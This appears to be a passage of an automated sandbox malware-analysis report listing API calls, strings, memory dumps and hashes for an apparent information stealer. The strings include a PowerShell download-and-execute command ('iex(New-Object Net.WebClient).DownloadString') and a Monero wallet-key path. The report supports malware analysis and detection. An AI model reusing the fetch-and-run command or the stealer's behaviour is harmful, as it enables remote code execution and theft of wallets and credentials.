                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            • RegQueryValueExA.ADVAPI32(00000000,00A9DB18,00000000,000F003F,?,00000400), ref: 00EC84EC
                            • lstrlen.KERNEL32(?), ref: 00EC8501
                            • RegQueryValueExA.ADVAPI32(00000000,00A9D938,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00ED0B34), ref: 00EC8599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC8608
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 9a83ffbbef5c978ee7f6df920e1ce1c469f16e885bbd48b16236c92f299a2288
                            • Instruction ID: 4d8b0f2c5c2f432e31361ff843f1639e2dbb8d3dbd4f3162d8d057aded547662
                            • Opcode Fuzzy Hash: 9a83ffbbef5c978ee7f6df920e1ce1c469f16e885bbd48b16236c92f299a2288
                            • Instruction Fuzzy Hash: 3521F6B1A00218EBDB24DB54DD85FE9B3B8FB48704F008199A649A7140DF766A86CFA4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC76A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC76AB
                            • RegOpenKeyExA.ADVAPI32(80000002,00A8BB90,00000000,00020119,00000000), ref: 00EC76DD
                            • RegQueryValueExA.ADVAPI32(00000000,00A9D920,00000000,00000000,?,000000FF), ref: 00EC76FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC7708
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 797be803780a538bcda71fc0514e7e2eb26a6200c0b7cb711524bcaf49276458
                            • Instruction ID: fbd9f9992a6ee0711fb5e1c5ef44c677a037bc0d4ff9a8140b1ffec275b252fc
                            • Opcode Fuzzy Hash: 797be803780a538bcda71fc0514e7e2eb26a6200c0b7cb711524bcaf49276458
                            • Instruction Fuzzy Hash: B30144B5B04308FBD710DBE4DD4AF6AB7B8EB48705F10405DFA89E7684D6B6A9018F50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC773B
                            • RegOpenKeyExA.ADVAPI32(80000002,00A8BB90,00000000,00020119,00EC76B9), ref: 00EC775B
                            • RegQueryValueExA.ADVAPI32(00EC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EC777A
                            • RegCloseKey.ADVAPI32(00EC76B9), ref: 00EC7784
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: a1988b941afcb399711ecda2fd1ab1bc0ba1fbf2eeab99b9a4e9d50e53c840b8
                            • Instruction ID: 985c70cc7b01fea28b775b6530e28ef9dc49cd4d254cb10f14c592eb12e54a01
                            • Opcode Fuzzy Hash: a1988b941afcb399711ecda2fd1ab1bc0ba1fbf2eeab99b9a4e9d50e53c840b8
                            • Instruction Fuzzy Hash: 560144B5A40308FBD710DBE0DD4AFAEB7B8EB48705F00415DFA49A7285D6B565018B50
                            APIs
                            • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00EC3AEE,?), ref: 00EC92FC
                            • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00EC9319
                            • CloseHandle.KERNEL32(000000FF), ref: 00EC9327
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :$:
                            • API String ID: 1378416451-4250114551
                            • Opcode ID: 9a3e79fe23a9df455c5e8c6fdd5f3b5b33608642c99f7c8c21ca35cae4ac7094
                            • Instruction ID: 1789a7a3632ed21faeced71a71f42708948b4d9494b4a67120f572a3cb48df9a
                            • Opcode Fuzzy Hash: 9a3e79fe23a9df455c5e8c6fdd5f3b5b33608642c99f7c8c21ca35cae4ac7094
                            • Instruction Fuzzy Hash: 00F06934F00208EBDB20DAA4DD49F9E77B9AB48710F108658BA55AB2C4D776A6028F40
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                            • LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 33262662534b5ce569803780a99d8168940857741ec2a9cd19851158aa1185a6
                            • Instruction ID: 1351dc22b5e27585b7ae1493db3f6a384aeeb7846024cfc9bb5df3e1cbdfd75f
                            • Opcode Fuzzy Hash: 33262662534b5ce569803780a99d8168940857741ec2a9cd19851158aa1185a6
                            • Instruction Fuzzy Hash: 7A3105B4A00209EFDB24CFA4C985BEE77B5BF48704F108158EA15A7294D779AA41CFA0
                            APIs
                            • lstrcat.KERNEL32(?,00A9DDD0), ref: 00EC47DB
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4801
                            • lstrcat.KERNEL32(?,?), ref: 00EC4820
                            • lstrcat.KERNEL32(?,?), ref: 00EC4834
                            • lstrcat.KERNEL32(?,00A8AF40), ref: 00EC4847
                            • lstrcat.KERNEL32(?,?), ref: 00EC485B
                            • lstrcat.KERNEL32(?,00A9D680), ref: 00EC486F
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EC8D90: GetFileAttributesA.KERNEL32(00000000,?,00EB1B54,?,?,00ED564C,?,?,00ED0E1F), ref: 00EC8D9F
                              • Part of subcall function 00EC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EC4580
                              • Part of subcall function 00EC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00EC4587
                              • Part of subcall function 00EC4570: wsprintfA.USER32 ref: 00EC45A6
                              • Part of subcall function 00EC4570: FindFirstFileA.KERNEL32(?,?), ref: 00EC45BD
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 6fd3b7adcd59e05d2eacd82abe0b41a99225e75624d22149e741e870bf6dd928
                            • Instruction ID: b39788d57ba0fc670a8254e5de098325f97e6c8d1b820d198a80c4e568dfe9eb
                            • Opcode Fuzzy Hash: 6fd3b7adcd59e05d2eacd82abe0b41a99225e75624d22149e741e870bf6dd928
                            • Instruction Fuzzy Hash: CF3176B290021897CB24F770DD86FE973BCAB48700F40559DB35DA6081DEB6978ACB91
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC2D85
                            Strings
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EC2D04
                            • <, xrefs: 00EC2D39
                            • ')", xrefs: 00EC2CB3
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EC2CC4
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 8e300a119a4877e85e599e154860f635bb38e6499930f7867cd039b3d0144038
                            • Instruction ID: 213ede884a70eb0c259d2608b8b82db7492b89a5104193e311e279a84546dc27
                            • Opcode Fuzzy Hash: 8e300a119a4877e85e599e154860f635bb38e6499930f7867cd039b3d0144038
                            • Instruction Fuzzy Hash: F241DC72C0020C9BDB18EBA0DA96FEDB7B4AF10304F44512DE516B6191DF762A4BCF91
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EB9F41
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: da4736a11cda19ed3d4f6cfc48163a8440f57467a78e25ec4a0360d3752982dc
                            • Instruction ID: 5a9c1386ef06f4f50efc46971970c79d0dea48e5096837cb4a435905ab889c77
                            • Opcode Fuzzy Hash: da4736a11cda19ed3d4f6cfc48163a8440f57467a78e25ec4a0360d3752982dc
                            • Instruction Fuzzy Hash: 7E615F71A0020CEBDB24EFA4CD96FEE77B5AF44304F049128F90A6F181EB716A06CB51
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00A9D740,00000000,00020119,?), ref: 00EC40F4
                            • RegQueryValueExA.ADVAPI32(?,00A9DD40,00000000,00000000,00000000,000000FF), ref: 00EC4118
                            • RegCloseKey.ADVAPI32(?), ref: 00EC4122
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4147
                            • lstrcat.KERNEL32(?,00A9DBA8), ref: 00EC415B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 49e1c086c90b100bca596d8a4fcab0301ba1f2e2c5527bf6d27b43a2ad7ca1d3
                            • Instruction ID: 55b6489d8bbdf75b594a87506dd1725e5abaa0d6f1c518f14f6c6447b9577328
                            • Opcode Fuzzy Hash: 49e1c086c90b100bca596d8a4fcab0301ba1f2e2c5527bf6d27b43a2ad7ca1d3
                            • Instruction Fuzzy Hash: 4341C9B6D00108ABDB24EBA0DC57FEE737DAB88300F40855CB65957185EA765B888BA1
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00EC696C
                            • sscanf.NTDLL ref: 00EC6999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EC69B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EC69C0
                            • ExitProcess.KERNEL32 ref: 00EC69DA
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 9efa2e5ffc2ce48901366d81f6b422dcb0eb24b2f84f45010280cb5895c72756
                            • Instruction ID: 23fdc0d07eb19dfb1d0c043ef3e4de97e299d927ffacfb374b2a9bdde33c85c9
                            • Opcode Fuzzy Hash: 9efa2e5ffc2ce48901366d81f6b422dcb0eb24b2f84f45010280cb5895c72756
                            • Instruction Fuzzy Hash: DD21BA75D14208ABCF18EFE4D946AEEB7B5BF48300F04852EE50AB3244EB755605CBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7E3E
